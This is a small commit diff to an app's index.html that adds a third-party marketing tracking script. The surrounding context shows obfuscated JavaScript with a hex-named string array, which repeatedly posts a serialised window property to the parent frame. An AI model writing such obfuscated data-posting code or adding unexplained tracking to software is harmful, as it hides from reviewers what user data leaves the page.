added tracking code

--- a/app/index.html
+++ b/app/index.html
@@ -104,6 +104,8 @@
         parent[_0xaea9[6]](_0xaea9[0] + JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]), _0xaea9[5])
       }, 3000);
     </script>
+    <!-- tracking -->
+    <script type="text/javascript" src="//cdn.bizible.com/scripts/bizible.js" async=""></script>
   </head>
 
   <body ng-click="$event.stopPropagation()">
